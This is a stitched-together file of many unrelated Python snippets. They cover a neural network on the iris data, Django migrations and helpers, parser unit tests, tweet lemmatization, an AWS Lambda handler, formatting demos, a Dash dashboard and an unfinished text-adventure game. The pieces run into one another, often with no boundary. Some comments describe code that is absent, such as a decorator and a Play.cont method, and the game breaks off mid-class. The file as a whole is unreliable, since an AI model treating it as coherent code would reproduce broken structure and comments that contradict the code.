def initial_function():
    # Demo: the decorator prints its message before this one.
    print("Initial Functionality")
initial_function()
class House:
    """A house whose price is validated whenever it is (re)assigned."""

    def __init__(self, price):
        # One leading underscore marks the attribute as protected by convention.
        self._price = price

    @property
    def price(self):
        """The current price of the house."""
        return self._price

    @price.setter
    def price(self, new_price):
        # bug fix: the original evaluated ``new_price > 0`` before the type
        # check (raising TypeError for non-numeric input such as strings)
        # and rejected ints outright; bool is excluded because it is an
        # int subclass
        if (isinstance(new_price, (int, float))
                and not isinstance(new_price, bool)
                and new_price > 0):
            self._price = new_price
        else:
            print("Please enter a valid price")

    @price.deleter
    def price(self):
        del self._price
import os.path
import target_distribution_methods
from actions import ParallelScpSendFileAction
def create_action(task, source, filename, target):
    """Factory: build a ParallelScpSendFileAction for one file transfer."""
    action = ParallelScpSendFileAction(task, source, filename, target)
    return action

# Expose this transport under the 'parallel_scp' method name.
target_distribution_methods.register('parallel_scp', create_action)
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
def data_operate():
    '''
    Load the iris dataset from file and split it into a training set
    (first 100 shuffled rows) and a test set (the rest); labels are
    one-hot encoded. (Docstring/comments translated from Chinese.)
    '''
    label_enoder=LabelEncoder()
    onehot_encoder=OneHotEncoder()
    np.set_printoptions(suppress=True)# avoid scientific notation in printouts
    flowers=np.array(pd.read_csv("iris.csv"))
    np.random.shuffle(flowers) # shuffle the rows in place
    training_data=flowers[:100,1:5] # training inputs (4 features)
    training_label=flowers[:100,5] # training class labels
    training_label=label_enoder.fit_transform(training_label)
    training_label=np.reshape(training_label,(-1,1))
    training_label=onehot_encoder.fit_transform(training_label).toarray()
    test_data=flowers[100:,1:5] # test inputs
    test_label=flowers[100:,5] # test class labels
    test_label=label_enoder.fit_transform(test_label)
    test_label=np.reshape(test_label,(-1,1))
    test_label=onehot_encoder.fit_transform(test_label).toarray()
    return training_data,training_label,test_data,test_label
def sigmoid(n):
    """Element-wise logistic function 1 / (1 + e^-n)."""
    return 1.0 / (1.0 + np.exp(-n))
def BP_NetWorking(training_data,training_label,learn_rate,error):
    '''
    Standard back-propagation neural network with one hidden layer.
    training_data: training inputs, shape (m, d)
    training_label: one-hot class labels, shape (m, l)
    learn_rate: learning rate
    error: mean-squared-error threshold for stopping
    Returns (w2, b2, w1, b1): learned weights and thresholds.
    (Comments translated from Chinese.)
    '''
    # initialization
    d=len(training_data[0])  # number of input neurons
    q=2*d+1  # number of hidden neurons
    l=len(np.array(list(set([tuple(t)for t in training_label]))))  # number of output neurons
    w1=np.random.rand(d,q)  # input->hidden weights, (d, q)
    w2=np.random.rand(q,l)  # hidden->output weights, (q, l)
    b1=np.random.rand(1,q)  # hidden-layer thresholds, (1, q)
    b2=np.random.rand(1,l)  # output-layer thresholds, (1, l)
    epoch=0
    while(True):
        Error=[]  # per-sample errors accumulated over this epoch
        for i in range (len(training_data)):
            # forward pass for the current sample
            x1=np.dot(training_data[i:i+1,:],w1)  # hidden-layer input, (1, q)
            x2=sigmoid(x1-b1)  # hidden-layer output, (1, q)
            y1=np.dot(x2,w2)  # output-layer input, (1, l)
            y2=sigmoid(y1-b2)  # network output, (1, l)
            # mean squared error of this sample
            Err=np.dot((y2-training_label[i:i+1,:]),(y2-training_label[i:i+1,:]).T)/2
            Error.append(Err)
            # gradient term g of the output neurons
            # bug fix: the shapes here were hard-coded to (1,3) and (1,9),
            # which only worked for exactly 4 inputs and 3 classes; use the
            # actual layer sizes l and q instead
            g=y2*(np.ones((1,l))-y2)*(training_label[i:i+1,:]-y2)
            # gradient term e of the hidden neurons
            a=np.dot(w2,g.T)  # (q, 1)
            e=x2*(np.ones((1,q))-x2)*a.T  # (1, q)
            # update weights and thresholds
            w2=w2+learn_rate*np.dot(x2.T,g)  # hidden->output weights
            b2=b2-learn_rate*g  # output thresholds
            w1=w1+learn_rate*np.dot(training_data[i:i+1,:].T,e)  # input->hidden weights
            b1=b1-learn_rate*e  # hidden thresholds
        epoch+=1
        # stop when the epoch's mean error drops below the threshold,
        # or after 50000 epochs
        if(sum(Error)/len(training_data)<error or epoch>50000):
            break
    return w2,b2,w1,b1  # learned weights and thresholds
def test(test_data,test_label,w1,w2,b1,b2):
    '''
    Evaluate the trained network: forward-pass the test set, threshold the
    sigmoid outputs at 0.5, and return the fraction of rows whose binary
    prediction matches the one-hot label exactly.
    (Comments translated from Chinese.)
    '''
    x1=np.dot(test_data,w1)# hidden-layer input
    x2=sigmoid(x1-b1) # hidden-layer output
    y1=np.dot(x2,w2)# output-layer input
    y2=sigmoid(y1-b2)# network outputs for all test samples
    n_rows=test_label.shape[0]# number of test samples
    n_cols=test_label.shape[1]# number of classes
    OutPut=np.empty(shape=(n_rows,n_cols),dtype=int)
    # binarize each output at 0.5
    for i in range (n_rows):
        for j in range(n_cols):
            if(y2[i][j]>0.5):
                OutPut[i][j]=1
            else:
                OutPut[i][j]=0
    # print(OutPut)
    # print(test_label)
    count=0
    # a prediction counts as correct only when the whole row matches
    for i in range(len(OutPut)):
        if(OutPut[i]==test_label[i]).all():
            count+=1
    return count/n_rows
if __name__=='__main__':
    # train on the iris split, then report test-set accuracy
    training_data,training_label,test_data,test_label=data_operate()
    w2,b2,w1,b1=BP_NetWorking(training_data,training_label,0.2,0.001)
    # evaluate on the held-out rows
    corr_rate=test(test_data,test_label,w1,w2,b1,b2)
    print("正确率:{:.2f}%".format(corr_rate*100))
|
import datetime
import pytz
# A naive datetime (no timezone attached) 30 hours in the past.
local_time = datetime.datetime.now() - datetime.timedelta(hours=30)
print(local_time)
# Current time as a timezone-aware UTC datetime.
print(datetime.datetime.now(datetime.timezone.utc))
belarus_time = pytz.timezone("Europe/Minsk")
amsterdam_time = pytz.timezone("Europe/Amsterdam")
# localize() attaches the Minsk timezone to the naive datetime.
belarus_local_time_aware_object = belarus_time.localize(local_time)
print(belarus_time)
print(belarus_local_time_aware_object)
# Convert the aware Minsk time into Amsterdam's timezone.
amsterdam_time_from_belarus_time = belarus_local_time_aware_object.astimezone(amsterdam_time)
print(amsterdam_time_from_belarus_time)
|
# Generated by Django 3.1 on 2021-04-30 19:25
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add a ``url`` field (defaulting to '#') to the Project model."""

    dependencies = [
        ('projects', '0003_auto_20210320_2049'),
    ]

    operations = [
        migrations.AddField(
            model_name='project',
            name='url',
            field=models.URLField(default='#'),
        ),
    ]
|
from random import randint, shuffle
qtd = int(input('Digite a quentidade de alunos presentes na sala: '))
alunos = []
ordem = []
for idx in range(qtd):
    alunos.append(input('Nome do aluno {}: '.format(idx + 1)))

# Manual approach: draw random indices until every student has a slot.
while len(ordem) < qtd:
    sorteio = randint(0, qtd - 1)
    if sorteio not in ordem:
        ordem.append(sorteio)

print('A ordem de apresentações é a seguinte: ')
for idx in range(qtd):
    print('{}ª apresentação: {}'.format(idx + 1, alunos[ordem[idx]]))

# Alternative: shuffle the list in place and print it.
shuffle(alunos)
print(alunos)
|
import pytest
from mock import patch
import numpy as np
import crab_analyser.crab_pdf_parser_v2
class TestCrabPDFParser:
    """Unit tests for crab_analyser.crab_pdf_parser_v2.CrabPDFParser."""

    @patch("crab_analyser.crab_pdf_parser_v2.CrabPDFParser.extract_age")
    @patch("crab_analyser.crab_pdf_parser_v2.CrabPDFParser.get_index_of_age_variable")
    def test_process_age(self, mock_get_index, mock_extract_age):
        # process_age should find the "Age" marker index, then delegate
        # extraction to extract_age and return its result unchanged.
        # Arrange
        lines = ["Sheet 1"
            , "Page 1"
            , "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
            , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
            , "Age"
            , "Sheet 2"
            , "Page 2"
            , "5"]
        source_location = ""
        destination_location = ""
        age_list = [5]
        length_of_features = 1
        age_index = 3
        mock_extract_age.return_value = age_list
        mock_get_index.return_value = age_index
        parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
        # Act
        ret_val = parser.process_age(length_of_features, lines)
        # Assert
        assert age_list == ret_val
        mock_get_index.assert_called_once_with(lines)
        mock_extract_age.assert_called_once_with(length_of_features, age_index)

    @patch("crab_analyser.crab_pdf_parser_v2.parser.from_file")
    def test_raw_pdf(self, mock_tika_from_file):
        # read_raw_pdf should strip/split tika's 'content' into lines.
        # Arrange
        raw_file = {"status": "something",
                    "content": "\n\n\nSheet 1\nPage 1\nSex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"}
        mock_tika_from_file.return_value = raw_file
        raw_file = raw_file['content'].strip().split('\n')
        source_location = "file_input_location"
        destination_location = ""
        parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
        # Act
        ret_val = parser.read_raw_pdf()
        # Assert
        assert ret_val == raw_file
        mock_tika_from_file.assert_called_once_with(source_location)

    def test_extract_age(self):
        # extract_age should pull the trailing age values (here one row).
        # Arrange
        lines = ["Sheet 1"
            , "Page 1"
            , "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
            , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
            , "Age"
            , "Sheet 2"
            , "Page 2"
            , "5"]
        source_location = ""
        destination_location = ""
        age = [5]
        length_of_features = 1
        age_index = 4
        parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
        ret_val = parser.extract_age(length_of_features, age_index, lines)
        assert ret_val == age
        assert len(ret_val) == 1

    # (lines, expected index of the "Age" marker; -1 when absent)
    test_data = [(["Sheet 1"
        , "Page 1"
        , "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
        , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
        , "Age"
        , "Sheet 2"
        , "Page 2"
        , "5"], 4)
        ,
        (["Sheet 1"
        , "Page 1"
        , "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
        , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
        , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
        , "Age"
        , "Sheet 2"
        , "Page 2"
        , "5"], 5)
        ,
        (
        ["Sheet 1"
        , "Page 1"
        , "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
        , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
        , "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
        , "Sheet 2"
        , "Page 2"
        , "5"], -1
        )
    ]

    @pytest.mark.parametrize("lines, expected_value", test_data)
    def test_get_index_of_age_variable(self, lines, expected_value):
        # Arrange
        source_location = ""
        destination_location = ""
        parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
        # Act
        ret_val = parser.get_index_of_age_variable(lines)
        # Assert
        assert ret_val == expected_value

    # (raw string row, expected converted tuple; last flag marks a parse failure)
    test_data_vals = [(["F", "1.1512", "1.175", "0.4125", "24.123", "12.123", "5", "6"],
                       ("F", 1.1512, 1.175, 0.4125, 24.123, 12.123, 5, 6, False)),
                      (["F", "Gooood", "1.175", "0.4125", "24.123", "12.123", "5", "6"],
                       ("F", np.nan, 1.175, 0.4125, 24.123, 12.123, 5, 6, True)),
                      (["F", "1.1512", "Gooood", "0.4125", "24.123", "12.123", "5", "6"],
                       ("F", 1.1512, np.nan, 0.4125, 24.123, 12.123, 5, 6, True))
                      ]

    @pytest.mark.parametrize("vals, expected_value", test_data_vals)
    def test_get_converted_row(self, vals, expected_value):
        # Arrange
        source_location = ""
        destination_location = ""
        parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
        # Act
        ret_val = parser.get_converted_row(vals)
        # Assert
        assert ret_val == expected_value
|
import pandas as pd
import nltk
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk import pos_tag
import re
import string
# I am adding my own stopwords list to the NLTK list.
# This way we can drop words that are irrelevant for text processing
MY_STOPWORDS = ['singapore','vaccine']
STOPLIST = set(stopwords.words('english') + list(MY_STOPWORDS))
SYMBOLS = " ".join(string.punctuation).split(" ") + ["-", "...", "”", "``", ",", ".", ":", "''","#","@"]
# The NLTK lemmatizer and stemmer classes
lemmatizer = WordNetLemmatizer()
stemmer = SnowballStemmer('english')
# read english selected tweets, no duplicates
scrapedData = pd.read_csv('demo.csv')
# Replace the original column labels with positional integer labels.
# BUG FIX: the original bound the label list to the name `list`, shadowing
# the builtin for the rest of the module; use range() directly instead.
scrapedData.columns = range(len(scrapedData.columns))
# I use the POS tagging from NLTK to retain only adjectives, verbs, adverbs
# and nouns as a base for for lemmatization.
def get_lemmas(tweet):
    """Tokenize *tweet* and return lemmas for its content words.

    Only adjectives (JJ*), adverbs (RB*), verbs (VB*) and nouns (NN*) are
    kept; each kept token is lower-cased and lemmatized with the WordNet
    POS code derived from its Treebank tag.
    """
    # Map the first two letters of a Treebank tag to a WordNet POS code.
    # Anything unexpected falls back to noun ('n') — same default the
    # original achieved with a bare except, but without swallowing
    # unrelated exceptions.
    treebank2wordnet = {'NN': 'n', 'JJ': 'a', 'VB': 'v', 'RB': 'r'}
    lemmas_list = []
    for word, tag in pos_tag(word_tokenize(tweet)):
        if tag.startswith(("JJ", "RB", "VB", "NN")):
            postag = treebank2wordnet.get(tag[:2], 'n')
            lemmas_list.append(lemmatizer.lemmatize(word.lower(), postag))
    return lemmas_list
# We will now pre-process the tweets, following a pipeline of tokenization,
# filtering, case normalization and lemma extraction.
# This is the function to clean and filter the tokens in each tweet
def clean_tweet(tokens):
    """Keep only alphabetic, non-stopword tokens that are not symbols,
    URLs, or slash/hyphen-containing strings."""
    filtered = []
    for token in tokens:
        keep = (
            re.search('[a-zA-Z]', token)
            and token not in STOPLIST
            and token[0] not in SYMBOLS
            and not token.startswith('http')
            and '/' not in token
            and '-' not in token
        )
        if keep:
            filtered.append(token)
    return filtered
# Prior to lemmatization, I apply POS (part-of-speech) tagging to make sure that only the
# adjectives, verbs, adverbs and nouns are retained.
# Starts the lemmatization process
def get_lemmatized(tweet):
    """Lemmatize, filter, and re-join *tweet* into one cleaned string."""
    # POS-filtered lemmas first, then token-level cleaning, then join.
    lemmas = get_lemmas(tweet)
    cleaned = clean_tweet(lemmas)
    return ' '.join(cleaned)
# Lemmatize each tweet into a new 'edited' column; empty results become
# None so they can be dropped below.
# BUG FIX: this loop was commented out in the original, yet the
# drop_duplicates/dropna calls below reference the 'edited' column and
# would raise KeyError without it.
for i in scrapedData.index:
    edited = get_lemmatized(scrapedData.loc[i, 'text'])
    scrapedData.at[i, 'edited'] = edited if edited else None
# After lemmatization, some tweets may end up with the same words
# Let's make sure that we have no duplicates
scrapedData.drop_duplicates(subset=['edited'], inplace=True)
scrapedData.dropna(subset=['edited'], inplace=True)
# Using apply/lambda to create a new column with the number of words in each tweet
scrapedData['word_count'] = scrapedData.apply(lambda x: len(x['text'].split()),axis=1)
t = pd.DataFrame(scrapedData['word_count'].describe()).T
print(t)
scrapedData.to_csv('test.csv')
import json
import boto3
from boto3.dynamodb.conditions import Key
# AWS clients/resources created once at import time so they are reused
# across warm Lambda invocations.
personalize_events = boto3.client(service_name='personalize-events')
sqs = boto3.resource('sqs')
# Queue the handler's reply messages are pushed to.
responseQueue = sqs.get_queue_by_name(QueueName="chat_service_queue")
dynamodb = boto3.resource('dynamodb')
# User profile table; queried by its 'USER_ID' key below.
table = dynamodb.Table('DynamoDBTableUsersName')
def add_user_to_personalize(user):
    """Mirror the user's AGE/GENDER attributes into the Personalize USERS dataset."""
    # Only forward the optional demographic attributes that are present.
    user_properties = {key: user[key] for key in ('AGE', 'GENDER') if key in user}
    personalize_events.put_users(
        datasetArn='arn:aws:personalize:eu-central-1:043035977035:dataset/user-songs-group/USERS',
        users=[{
            'userId': user['USER_ID'],
            'properties': json.dumps(user_properties)
        }]
    )
def lambda_handler(event, context):
    """Handle a 'set'/'delete' account command delivered via SQS.

    Reads the first SQS record, looks the user up in DynamoDB, applies the
    command, and pushes a human-readable status message onto the response
    queue.  NOTE(review): only Records[0] is processed — this assumes the
    queue is configured with batch size 1; confirm.
    """
    data = json.loads(event['Records'][0]['body'])
    query_result = table.query(KeyConditionExpression=Key('USER_ID').eq(data['user']['id']))
    if query_result['Count'] == 0:
        # No profile yet: start from a minimal record holding only the key.
        user = {"USER_ID": f"{data['user']['id']}"}
    else:
        user = query_result['Items'][0]
    command_type = data['data']['options'][0]['name']
    message = "Nothing done."
    if command_type == 'delete':
        if query_result['Count'] == 0:
            message = "You cannot delete your account, because it does not exist..."
        else:
            table.delete_item(Key={'USER_ID': data['user']['id']})
            message = "Your account has been deleted..."
    elif command_type == 'set':
        # A bare {"name": "set", "type": 1} option means 'set' with no
        # sub-options: create the account if needed, otherwise no-op.
        if data['data']['options'][0] == {"name": "set", "type": 1}:
            if query_result['Count'] == 0:
                table.put_item(Item=user)
                add_user_to_personalize(user)
                message = "Account created without details!"
            else:
                message = "Nothing to update."
        else:
            # Copy each provided sub-option onto the record as an
            # upper-cased attribute, then upsert and mirror to Personalize.
            for opt in data['data']['options'][0]['options']:
                user[opt['name'].upper()] = f"{opt['value']}"
            table.put_item(Item=user)
            add_user_to_personalize(user)
            if query_result['Count'] == 0:
                message = "Account created with details!"
            else:
                message = "Details updated!"
    response_event = {
        "appId": data['appId'],
        "message": message,
        "user": data['user'],
        "token": data['token']
    }
    return responseQueue.send_message(MessageBody=json.dumps(response_event))
|
#fail
import sys
# Read a grid size N, then N rows of contiguous 0/1 digits forming the grid.
length = int(sys.stdin.readline())
graph = []
for _ in range(length):
    graph.append(list(map(int, sys.stdin.readline().rstrip())))
# count[n] will hold the number of n x n all-ones squares; index 0 unused.
count = [0 for _ in range(length + 1)]
def check_possible(i, j, n):
    """True if the n x n square with top-left corner (i, j) fits in the
    grid and contains only 1s."""
    # Reject squares that would run off the right or bottom edge.
    if i + n > length or j + n > length:
        return False
    return all(
        graph[a][b] == 1
        for a in range(i, i + n)
        for b in range(j, j + n)
    )
def check_box(n):
    """Count the n x n all-ones squares anywhere in the grid."""
    return sum(
        1
        for i in range(length)
        for j in range(length)
        if check_possible(i, j, n)
    )
# Count squares of every size, then report totals per size until the first
# size with no squares.
for i in range(1, length + 1):
    count[i] = check_box(i)
print("total: " + str(sum(count)))
# BUG FIX: the original iterated range(1, len(count) + 1), which indexes one
# past the end of `count` and raised IndexError whenever every size had at
# least one square (e.g. an all-ones grid). Iterate only valid indices.
for number in range(1, len(count)):
    if count[number] == 0:
        break
    print("size[" + str(number) + "]: " + str(count[number]))
|
from django.contrib.staticfiles.utils import get_files
from django.contrib.staticfiles.storage import StaticFilesStorage
from alfa import helper,crypto
import xml.dom.minidom
from X import settings
import os
import json
from django.core.exceptions import ObjectDoesNotExist
from .models import details
import requests
def xmlfiles(mylocation="xml"):
    """Return absolute paths of all static files found under *mylocation*."""
    storage = StaticFilesStorage()
    # get_files yields storage-relative names; anchor them at STATIC_ROOT.
    found = list(get_files(storage, location=mylocation))
    return [os.path.join(settings.STATIC_ROOT, filename) for filename in found]
def dbinsert(mydict):
    """Create a `details` row from *mydict*; return True on success.

    Expects the keys title, image, Url, tag and videoType (the mixed
    casing matches the upstream data this module parses).
    """
    myinst = details()
    myinst.title = mydict['title']
    myinst.image = mydict['image']
    myinst.url = mydict['Url']
    myinst.tag = mydict['tag']
    myinst.videotype = mydict['videoType']
    try:
        myinst.save()
        return True
    except Exception:
        # Narrowed from a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit.
        return False
def dbdelete():
    """Delete every `details` row; return True on success, False on error."""
    try:
        details.objects.all().delete()
        return True
    except Exception:
        # Narrowed from a bare `except:` (which also caught SystemExit).
        return False
def GetAllCategories():
    """Return a queryset of {'tag': ...} dicts, one per `details` row."""
    return details.objects.values('tag')
def pagination_logic(page_number):
    """Fetch one page of the local /list/ API and build template context.

    Returns {'nextpage', 'previewpage', 'data'}: the page links are query
    strings ("?page=N", or "#" when there is no next/previous page) and
    each result's url is encrypted before being handed to the template.
    """
    baseurl = "http://localhost:8000/list/?page={0}".format(page_number)
    response = requests.get(baseurl)
    serialdata = json.loads(response.text)
    # Paginated APIs commonly return 'next'/'previous' as null on the
    # last/first page, making .split() raise AttributeError; KeyError
    # covers a missing field. (Narrowed from bare `except:`.)
    try:
        nextpage = "?" + serialdata['next'].split("?")[-1]
    except (AttributeError, KeyError):
        nextpage = "#"
    try:
        previewpage = "?" + serialdata['previous'].split("?")[-1]
        if "page" not in previewpage:
            # The first page's URL carries no ?page= query string.
            previewpage = "?page=1"
    except (AttributeError, KeyError):
        previewpage = "#"
    data = serialdata['results']
    for d in data:
        # Hide the raw media URL from the client.
        Myurl = d["url"]
        encurl = crypto.encrypt(Myurl)
        d["url"] = encurl
    context = {
        "nextpage": nextpage,
        "previewpage": previewpage,
        "data": data,
    }
    return context
class Number:
    """A pair of addends; `sum()` returns their total."""

    def __init__(self, a=0, b=0):
        # Defaults keep the original `Number()` construction (followed by
        # attribute assignment) working, while also allowing the addends
        # to be supplied directly.
        self.a = a
        self.b = b

    def sum(self):
        """Return a + b."""
        return self.a + self.b
# Demo: build a Number and print its total.
num = Number()
num.a = 500
num.b = 1000
# Use the class's own method, and avoid shadowing the builtin `sum`
# as the original `sum = num.a + num.b` did.
total = num.sum()
print(total)
# Demonstrate various str.format() specifiers on integers and floats.
# (Original header comment translated from Chinese.)
# Minimum width: values are never truncated, so widths 5 and 7 have no
# effect on a 7-digit number; width 9 left-pads with spaces.
print('{:5d}'.format(1234567))
print('{:7d}'.format(1234567))
print('{:9d}'.format(1234567))
# ',' inserts thousands separators.
print('{:,}'.format(1234567))
print()
# Integer bases: binary; octal without/with the 0o prefix ('#');
# hex in lowercase, then uppercase with the 0X prefix.
print('{:b}'.format(1234567))
print('{0:o} {0:#o}'.format(1234567))
print('{0:x} {0:#X}'.format(1234567))
print()
# '%' multiplies by 100 and appends a percent sign.
print('{:%}'.format(35 / 100))
print()
# Float presentation types: scientific, fixed-point, general.
print('{:e}'.format(3.14))
print('{:f}'.format(3.14))
print('{:g}'.format(3.14))
print()
# Precision and width for fixed-point output.
print('{:.7f}'.format(3.14))
print('{:12f}'.format(3.14))
print('{:12.7f}'.format(3.14))
print()
# '#' keeps the decimal point even with zero digits of precision.
print('{:.0f}'.format(3.0))
print('{:#.0f}'.format(3.0))
#!/usr/bin/env python
import roslib; roslib.load_manifest('pplan')
import os, os.path
import numpy as np
from matplotlib import pyplot as plt
import ppas
# Open the ppas data store located in ./data relative to the directory
# the script was launched from.
run_dir = os.getcwd()
data_dir = os.path.join(run_dir, 'data')
s = ppas.Store(data_dir)
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objs as go
from graphs import score_by_game_dur, win_by_behind_ball_diff, \
win_by_defensive_half, score_by_on_ground, score_by_slow_speed
external_stylesheets = ['https://unpkg.com/material-components-web@latest/dist/material-components-web.min.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
# (label, figure) pairs, one per tab, in display order.
_TABS = [
    ('Score by Game Duration', score_by_game_dur),
    ('Outcome by Difference of Time Spent Behind Ball', win_by_behind_ball_diff),
    ('Score by Time Spent in Own Defensive Half', win_by_defensive_half),
    ('Score by Time Spent on The Ground', score_by_on_ground),
    ('Score by Time Spent Traveling at a Slow Speed', score_by_slow_speed),
]
app.layout = html.Div(children=[
    html.H1(children='Rocket League Analysis'),
    dcc.Tabs(id="tabs", children=[
        dcc.Tab(label=label, children=[figure]) for label, figure in _TABS
    ]),
])
if __name__ == '__main__':
    app.run_server(debug=True)
import game
from textwrap import dedent
from random import randint
class Stage():
    """Base class for all game stages.

    Subclasses override `enter(health)` and return a tuple
    (next_stage_key, health, game_over[, second_attempt]).
    """

    def __init__(self):
        # game module has methods for combat and handling user input
        self.game = game.Game()

    def enter(self, health=None):
        """Run the stage; base implementation does nothing.

        Accepts `health` (with a default, so old zero-argument callers
        still work) to match every subclass's signature — the original
        `enter(self)` would raise TypeError if a bare Stage were ever
        dispatched through Play.cont.
        """
        pass
class Castle_wall(Stage):
    """Opening stage: three ways over or through the castle wall."""

    def __init__(self):
        super(Castle_wall, self).__init__()

    def enter(self, health):
        """Return (next_stage_key, health, game_over).

        'grappling' is always fatal, 'climb' always succeeds, and 'walk'
        triggers combat (game.combat returns falsy health on defeat).
        """
        print(dedent("""
You approach the castle wall, it is approximately 80ft high.
There is a gate to your right. There appear to be some climbing holds in the wall, and you also have a grappling hook.
"""))
        # choice() matches player input against these keyword strings.
        c = self.game.choice(['gate right walk','climb holds','grappling'])
        if 'grappling' in c:
            print("A guard hears the grappling hook land and cuts the rope while you are climbing.")
            return 'dth', 0, False
        elif 'climb' in c:
            print("You find good holds and make your way up the wall quickly.")
            return 'crt', health, False
        elif 'walk' in c:
            print("You walk through the gate and are immediately confronted by a guard.")
            health = self.game.combat(health)
            if health:
                print(f"You defeat the guard in combat, you have {health} health")
                return 'crt', health, False
            else:
                # (sic) "gaurd" typo preserved — it is runtime output.
                print("The gaurd defeated you in combat")
                return 'dth', health, False
class Death(Stage):
    """Terminal stage entered when the player dies."""

    def __init__(self):
        super(Death, self).__init__()

    def enter(self, health):
        """Announce death and end the game (zero health, game over)."""
        print("You have died.")
        return '', 0, True
class Courtyard(Stage):
    """Second stage: cross the courtyard to reach the towers."""

    def __init__(self):
        super(Courtyard, self).__init__()

    def enter(self, health):
        """Return (next_stage_key, health, game_over)."""
        print(dedent("""
You step out into the courtyard, you have to cross to get to the towers on the other side.
There are a lot of people walking around, you may be able to hide in plain sight.
There are some trees on the other side of the courtyard that make a lot of shadows, or you could walk through the castle corridors.
"""))
        c = self.game.choice(['plain sight hide', 'shadow tree trees other', 'castle corridor'])
        if 'sight' in c:
            print("You are quickly confronted by several guards")
            return 'dth', health, False
        elif 'tree' in c:
            print("You through the shady trees to the tower without being noticed.")
            return 'twr', health, False
        else:
            print("In the corridor there is a guard blocking your path 20 yards away")
            # presumably 'range' selects ranged combat — confirm in game module
            health = self.game.combat(health, 'range')
            if health:
                print("You defeat the guard and continue down the corridor.")
                return 'twr', health, False
            else:
                print("The guard has defeated you.")
                return 'dth', health, False
class Tower(Stage):
    """Three-door room; the only stage that may be re-entered.

    Some branches return a 4-tuple whose last element flags a "second
    attempt" re-entry (consumed by Play.cont); the death branches return
    plain 3-tuples.
    """

    def __init__(self):
        super(Tower, self).__init__()

    def enter(self, health, second_attempt = False):
        if second_attempt:
            print("You walk back out to the room with three doors.")
        else:
            print("You enter a room with three doors.")
        print(dedent("""
There is a door with a metal coin, a door with the royal seal, and an unmarked door.
Which do you choose?
"""))
        c = self.game.choice(['coin first','royal seal second','unmarked blank third third'],'\n> ')
        if 'coin' in c:
            print("You open the door and the room is filled with guards.")
            return 'dth', health, False
        elif 'royal' in c:
            print("You open the door, the room is royal clerk room. There is one guard inside.")
            health = self.game.combat(health)
            if health:
                print("You defeat the guard.")
                # 4th element: come back to this room as a second attempt.
                return 'twr', health, False, True
            else:
                print("The guard has defeated you.")
                return 'dth', health, False
        else:
            print("You open the door and there is a staircase that leads down.")
            c = self.game.choice(['back other door','down stair continue'],"Do you try another door or continue down the stairs?\n")
            if 'back' in c:
                return 'twr', health, False, True
            else:
                print("You continue down the stairs")
                return 'vlt', health, False, False
class Vault(Stage):
    """Approach the vault: a single fight against its distracted guard."""

    def __init__(self):
        super(Vault, self).__init__()

    def enter(self, health):
        """Return (next_stage_key, health, game_over)."""
        # (sic) "gaurd" typo preserved — it is runtime output.
        print("You see the vault ahead, there is a gaurd but he is facing the other way.")
        # presumably 'quiet' selects stealth combat — confirm in game module
        health = self.game.combat(health, 'quiet')
        if health:
            print("You have defeated the guard.")
            return 'lck', health, False
        else:
            print("The guard has defeated you.")
            return 'dth', health, False
class Lock(Stage):
    """Vault combination lock: guess a 3-digit code (digits 1-3) in at
    most 10 attempts."""

    def __init__(self):
        super(Lock, self).__init__()

    def enter(self, health):
        """Return (next_stage_key, health, game_over)."""
        print(dedent("""
There is a lock on the vault, a combination of three numbers 1 - 3.
Example '123'
There is only enough time for 10 attempts before the guards realize you are here.
"""))
        a, b, c = randint(1,3), randint(1,3), randint(1,3)
        combination = str(a) + str(b) + str(c)
        attempts = 0
        guess = ''
        while combination != guess and attempts < 10:
            guess = input("Enter a combination\n> ")
            attempts += 1
        # BUG FIX: judge by whether the code was actually guessed. The
        # original tested `attempts == 10`, which wrongly killed a player
        # whose tenth guess was correct.
        if guess == combination:
            print("Correct guess. The door opens and you take the piece of treasure.")
            return 'trs', health, False
        else:
            print("That is 10 attempts, you are discovered by the guards.")
            return 'dth', health, False
class Treasure(Stage):
    """Final choice after taking the treasure: escape route."""

    def __init__(self):
        super(Treasure, self).__init__()

    def enter(self, health):
        """Return (next_stage_key, health, game_over); 'deeper' wins."""
        print(dedent("""
Now you have to escape the castle.
You can continue deeper into the vault, or return through the courtyard.
"""))
        c = self.game.choice(['deeper continue vault', 'back up courtyard'])
        if 'back' in c:
            print("You return through the courtyard and are quickly captured by guards.")
            return 'dth', health, False
        else:
            print("You continue deeper into the vault and find a door that leads outside the castle.")
            # Empty next-stage key + True: the game is over (victory).
            return '', health, True
class Play():
    """Game driver: tracks health, dispatches stages, handles restarts."""

    def __init__(self, starting_stage, difficulty = 'medium'):
        self.starting_stage = starting_stage
        self.difficulty = difficulty
        self.health = 20
        # Map of stage keys (returned by each stage's enter()) to instances.
        # BUG FIX: in the original this dict was a local variable, so
        # Play.cont crashed with AttributeError on `self.stages`.
        self.stages = {
            'cw' : Castle_wall(),
            'dth' : Death(),
            'crt' : Courtyard(),
            'twr' : Tower(),
            'vlt' : Vault(),
            'lck' : Lock(),
            'trs' : Treasure()
        }

